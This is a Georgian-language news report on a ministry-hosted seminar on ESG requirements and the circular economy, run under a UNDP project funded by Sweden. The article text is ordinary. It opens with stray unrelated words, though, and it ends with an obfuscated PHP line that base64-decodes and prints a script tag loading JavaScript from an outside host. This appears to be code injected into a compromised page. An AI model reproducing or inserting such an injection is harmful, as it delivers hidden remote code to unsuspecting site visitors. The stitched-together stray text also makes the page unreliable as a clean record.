celsiusi
ავერსი შნაიდერი

საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილე სოლომონ პავლიაშვილი გაეროს განვითარების პროგრამის (UNDP) პროექტის „მმართველობის რეფორმის ფონდი (GRF)“ ფარგლებში მიმდინარე ქვეპროექტის „ცირკულარულ ეკონომიკაზე გადასვლის პროცესში საქართველოს მთავრობის მხარდაჭერა მმართველობისა და პოლიტიკის გასაძლიერებლად“ ორგანიზებით გამართულ სემინარს

„გარემოსდაცვითი, სოციალური და მმართველობის (ESG) მოთხოვნები“ დაესწრო. სემინარს გაეროს ცირკულარული ეკონომიკის მრჩეველთა საბჭოს წევრი, ცირკულარული ეკონომიკის, გარემოს დაცვის, სოციალური, მმართველობისა და მდგრადი დაფინანსების საკითხების საერთაშორისო ექსპერტი, დოქტორი დარიუშ პრასეკი უძღვებოდა. გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილე სოლომონ პავლიაშვილმა სემინარის მონაწილეებს საქართველოსთვის ევროკავშირის წევრობის კანდიდატი ქვეყნის სტატუსის მიღება მიულოცა და აღნიშნა, რომ ახლა კიდევ უფრო აქტიურად გაგრძელდება მუშაობა ყველა იმ მიმართულებით, რაც ქვეყნის ევროკავშირში საბოლო ინტეგრაციისთვის მნიშვნელოვანია.


„ჩვენ უკვე დავიწყეთ რეფორმების განხორციელება გარემოს დაცვის, ბიომრავალფეროვნების შენარჩუნების, ნარჩენების მართვის და სხვა არაერთი მიმართულებით. მნიშვნელოვან ნაბიჯებს ვდგამთ ცირკულარული და მწვანე ეკონომიკის განვითარებისთვის. ჩვენ უნდა ვეცადოთ მაქსიმალურად შევამციროთ რესურსებზე ზეწოლა და განვავითაროთ ისეთი ეკონომიკა, სადაც გარემოს დაცვის და სოციალური კომპონენტები დაბალანსებული და დაცული იქნება. მინდა მადლობა გადავუხადო ჩვენ პარტნიორებს გაეროს განვითარების პროგრამას და შვედეთის მთავრობას იმ მხარდაჭერისთვის, რასაც საქართველოში ცირკულარული ეკონომიკის განვითარების მიმართულებით ახორციელებენ“, - აღნიშნა სოლომონ პავლიაშვილმა.

სემინარის მონაწილეებმა განიხილეს საკითხები: სათანადო ESG რისკების გამოვლენა, ESG ეფექტიანობის მხარდაჭერა მართვის სისტემებით, დაფინანსების ხელშეწყობა ESG საკითხებზე თანმიმდევრული და სანდო ანგარიშგებით; გაეცნენ ინფორმაციას ESG ფაქტების, ESG ინვესტირების აღიარებული სტრატეგიების, ევროკავშირის მდგრადი დაფინანსების ჩარჩოს, საფინანსო ინსტიტუტების გარემოსდაცვითი და სოციალური სამოქმედო სტანდარტების, გარემოსდაცვითი ექსპერტიზისა და მონიტორინგის სფეროში საფინანსო ინსტიტუტების მოთხოვნების შესახებ.


სემინარს ესწრებოდნენ გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს, შვედეთის საელჩოს, სახელმწიფო და საერთაშორისო ორგანიზაციების წარმომადგენლები. სემინარი გაიმართა სბმკ „ორქისის“ ორგანიზებით, საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროსთან მჭიდრო თანამშრომლობით, გაეროს განვითარების პროგრამის (UNDP) პროექტის „მმართველობის რეფორმის ფონდი“ (GRF) ქვეპროექტის „ცირკულარულ ეკონომიკაზე გადასვლის პროცესში საქართველოს მთავრობის მხარდაჭერა მმართველობისა და პოლიტიკის გასაძლიერებლად“ ფარგლებში, რომელსაც შვედეთის მთავრობა აფინანსებს.

ქვეპროექტს ახორციელებს სბმკ „ორქისი“; საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის სამინისტრო მაკოორდინირებელის როლს ასრულებს.  

198
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");